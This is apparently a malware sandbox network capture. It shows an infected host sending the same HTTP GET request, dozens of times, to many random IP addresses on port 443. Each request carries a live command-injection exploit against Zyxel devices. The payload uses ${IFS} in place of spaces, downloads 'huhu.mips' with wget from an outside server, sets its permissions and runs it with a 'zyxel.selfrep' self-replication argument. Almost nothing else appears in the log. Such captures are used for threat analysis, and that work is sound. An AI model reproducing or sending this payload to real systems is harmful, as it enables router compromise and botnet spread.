                                      Jan 19, 2024 17:29:32.772619009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4419192.168.2.145020024.129.102.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772669077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4420192.168.2.1449902166.255.73.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772694111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4421192.168.2.1455734219.211.18.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772737026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4422192.168.2.145273264.195.167.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772790909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4423192.168.2.143614069.115.147.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772828102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4424192.168.2.14453304.141.234.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772845030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4425192.168.2.144154442.50.103.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772903919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4426192.168.2.1453830156.143.52.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772934914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4427192.168.2.143771873.100.119.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772985935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4428192.168.2.1444388129.12.108.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773020029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4429192.168.2.1451278171.252.92.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773058891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4430192.168.2.14531525.102.38.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773098946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4431192.168.2.1441700187.175.255.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773149014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4432192.168.2.1433426112.62.78.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773190022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4433192.168.2.1455348221.251.224.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773227930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4434192.168.2.1458530112.20.76.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773261070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4435192.168.2.144033877.132.100.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773288012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4436192.168.2.1437594142.78.23.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773344040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4437192.168.2.143735094.180.247.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773381948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4438192.168.2.144332847.78.21.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773401022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4439192.168.2.144612652.238.160.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773454905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4440192.168.2.1450774181.10.173.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773494005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4441192.168.2.1438904124.241.180.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773536921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4442192.168.2.145945481.70.143.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773580074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4443192.168.2.1458378103.48.234.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773631096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4444192.168.2.144505038.219.20.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773658991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4445192.168.2.1444650198.88.100.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773721933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4446192.168.2.1442632132.136.93.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773751974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4447192.168.2.1444948212.124.206.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773792028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4448192.168.2.1435530135.70.19.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773828983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4449192.168.2.1451410177.24.206.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773860931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4450192.168.2.145436249.203.6.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773896933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4451192.168.2.1442066212.250.164.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773917913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4452192.168.2.1451670131.160.242.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.773966074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4453192.168.2.144555040.61.64.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774028063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4454192.168.2.1448508169.126.110.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774085999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4455192.168.2.143617612.222.94.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774120092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4456192.168.2.1457038123.187.41.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774158955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4457192.168.2.143834239.57.35.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774219036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4458192.168.2.144375853.70.46.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774225950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4459192.168.2.143698873.115.38.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774288893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4460192.168.2.145162690.192.4.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774329901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4461192.168.2.1458592188.13.134.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774370909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4462192.168.2.144933841.28.62.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774393082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4463192.168.2.145819084.5.46.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774461031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4464192.168.2.143634237.44.150.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774498940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4465192.168.2.1443126139.72.80.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774550915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4466192.168.2.1437610129.106.10.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774573088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4467192.168.2.143489286.234.2.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774597883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4468192.168.2.1457408166.131.87.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774627924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4469192.168.2.145418265.241.6.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774679899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4470192.168.2.1459110189.131.145.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774744987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4471192.168.2.1460916165.25.128.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774764061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4472192.168.2.1435494122.221.198.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774817944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4473192.168.2.1442294192.230.64.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774844885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4474192.168.2.145933695.100.243.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774905920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4475192.168.2.1458528138.105.22.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774949074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4476192.168.2.1450996188.12.81.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.774976969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4477192.168.2.143511031.197.52.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775000095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4478192.168.2.1453628192.229.3.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775042057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4479192.168.2.1450112176.220.20.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775073051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4480192.168.2.144768262.106.81.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775098085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4481192.168.2.1443554191.18.202.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.775139093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4482192.168.2.145232263.24.235.210443
                                      TimestampBytes transferredDirectionData
